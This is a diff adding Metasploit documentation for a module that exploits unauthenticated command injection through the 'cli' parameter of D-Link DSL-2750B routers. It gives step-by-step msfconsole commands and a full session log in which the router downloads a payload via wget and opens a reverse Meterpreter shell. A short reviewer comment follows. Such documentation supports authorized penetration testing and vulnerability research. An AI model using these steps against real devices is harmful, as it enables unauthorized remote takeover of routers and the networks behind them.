documentation/modules/exploit/linux/http/dlink_dsl2750b_exec_noauth.md

```diff
@@ -0,0 +1,61 @@
+This module dlink_dsl2750b_exec_noauth exploits unauthenticated command injection vulnerability through "cli" parameter.
+Vulnerable firmwares are 1.01 up to 1.03.
+
+## Vulnerable Application
+
+  1. Start msfconsole
+  2. Do : `use exploit/linux/http/dlink_dsl2750b_exec_noauth`
+  3. Do : `set RHOST [RouterIP]`
+  4. Do : `set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp`
+  5. Do : `run`
+  6. If router is vulnerable, payload should be dropped via wget method and executed giving us meterpreter session
+
+
+## Example
+
+```
+msf5 > use exploit/linux/http/dlink_dsl2750b_exec_noauth 
+msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set RHOST 192.168.1.1
+RHOST => 192.168.1.1
+msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp 
+PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
+msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LHOST eth0
+LHOST => eth0
+msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LPORT 5555
+LPORT => 5555
+msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > run
+
+[*] Started reverse TCP handler on 192.168.1.6:5555 
+[*] 192.168.1.1:80 Checking target version...
+[*] Using URL: http://0.0.0.0:8080/V9GiueD0WW
+[*] Local IP: http://192.168.1.6:8080/V9GiueD0WW
+[*] Client 192.168.1.1 (Wget) requested /V9GiueD0WW
+[*] Sending payload to 192.168.1.1 (Wget)
+[*] Sending stage (1104216 bytes) to 192.168.1.1
+[*] Meterpreter session 18 opened (192.168.1.6:5555 -> 192.168.1.1:37259) at 2018-05-13 14:58:08 -0400
+[*] Command Stager progress - 100.00% done (114/114 bytes)
+[*] Server stopped.
+
+meterpreter > ls -la
```

Comment:
Output from `sysinfo` may be useful to internet historians; and output from `getuid` verifies your 1337 remote root prowess.